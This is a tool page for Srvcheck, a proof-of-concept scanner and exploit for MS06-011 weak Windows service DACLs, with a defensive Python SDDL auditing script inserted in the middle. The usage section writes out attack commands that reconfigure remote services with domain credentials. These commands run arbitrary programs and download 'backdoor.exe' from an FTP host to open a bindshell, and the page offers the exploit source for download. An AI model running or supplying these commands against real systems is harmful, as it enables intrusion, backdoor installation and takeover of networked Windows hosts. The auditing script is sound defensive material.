Introduction
Srvcheck is a proof of concept for MS06-011. This tool scans your network for
weak service DACLs and enumerates vulnerable services.
Because those permissive DACLs allow remote authenticated users to modify the
command that is executed, srvcheck deploys a VBS payload that executes a bindshell.

At this time, several products are affected by this vulnerability, so once you have
a valid domain user, srvcheck allows you to get access to several systems.
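
To audit for the weak service DACLs described above, the following added example (not part of srvcheck or its source code) parses security descriptors in the SDDL format printed by `sc sdshow <service>` and flags allow ACEs that grant configuration-changing rights to broad groups. The trustee list and the sample descriptors are constructed for illustration.

```python
import re

# Service-specific SDDL right codes that let a caller change what the
# service runs, with the matching access-mask bits for hex-encoded ACEs.
DANGEROUS = {"DC": 0x0002,       # SERVICE_CHANGE_CONFIG
             "WD": 0x00040000,   # WRITE_DAC
             "WO": 0x00080000,   # WRITE_OWNER
             "GW": 0x40000000,   # GENERIC_WRITE
             "GA": 0x10000000}   # GENERIC_ALL

# Trustees that cover ordinary authenticated accounts (SDDL alias or raw SID).
BROAD = {"AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
         "WD": "Everyone", "S-1-1-0": "Everyone",
         "BU": "Users", "S-1-5-32-545": "Users",
         "IU": "Interactive", "NU": "Network", "DU": "Domain Users"}

def dangerous_rights(rights):
    """Return the dangerous right codes present in an ACE rights field."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return [c for c, bit in DANGEROUS.items() if mask & bit]
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return [c for c in DANGEROUS if c in codes]

def weak_aces(sddl):
    """List (trustee name, rights) for allow ACEs in the DACL that grant
    config-changing rights to a broad trustee. The SACL (S:) is ignored."""
    dacl = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    findings = []
    for ace in re.findall(r"\(([^()]*)\)", dacl.group(1) if dacl else ""):
        fields = ace.split(";")  # type;flags;rights;obj;inherit_obj;trustee
        if len(fields) < 6 or fields[0] != "A":
            continue
        hits = dangerous_rights(fields[2])
        if hits and fields[5] in BROAD:
            findings.append((BROAD[fields[5]], hits))
    return findings

# Constructed sample descriptors (service names are hypothetical).
SAMPLES = {
    "WeakSvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)",
    "HexSvc": "D:(A;;0x000f01ff;;;S-1-1-0)(A;;CCLCSWLOCRRC;;;IU)",
    "SafeSvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCLCSWLOCRRC;;;AU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
}

if __name__ == "__main__":
    for name, sddl in SAMPLES.items():
        print(name, weak_aces(sddl) or "ok")
```

Any service reported here should have its DACL tightened so that only administrators and SYSTEM hold these rights.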
Details
The public version, srvcheck2, was improved. The new payload deployed with srvcheck3
works by transferring files over FTP, and allows faster network scanning.
Usage Information:
Srvcheck 3 - Windows Services ACL permission Scanner
(c) 2006 - 2008 Andres Tarasco - [email protected]
* PRIVATE BUILD for PENTESTERS - http://www.tarasco.org
Available parameters for SrvCheck3:
-----------------------------------
Srvcheck3.exe -l [options] List vulnerable services (locally or remotely)
-H Host|[ip1-ip2] Specify a remote host/s to connect (netbiosname/ip(s))
-f file Specify a ip/host file to audit (for example net view >file.txt)
Srvcheck3.exe -m service -c command Executes a remote command running as service
Srvcheck3.exe -m service [options] Executes backdoor or command for that service
-r ftphost ftpport backdoorfile Download configuration)
[-o optionalparameter] Additional parameter to be added to backdoorfile
You should also use always -u DOMAIN\user and -p password flags unless running from
a domain shell
examples:
----------
Srvcheck3.exe -l (list local vulnerabilities)
Srvcheck3.exe -l -H 192.168.1.1-192.168.1.255 -u domainuser -p domainpass
Srvcheck3.exe -l -f hosts.txt -u DOMAINuser -p password (list remote vulnerabilities)
Srvcheck3.exe -m service -H host -c "cmd.exe /c md c:\PWNED"
Srvcheck3.exe -m vulnservice -H 192.168.1.200 -u domainuser -p domainpass -r 192.168.1.1 21 backdoor.exe (executes backdoor.exe bindshell)
There is a paper that I published some time ago about MS06-011 (in Spanish). You can
download it here.
You can also browse the source code online.
Download srvcheck2 (Windows executable + Source code)
Download srvcheck3 (Windows executable + Source code)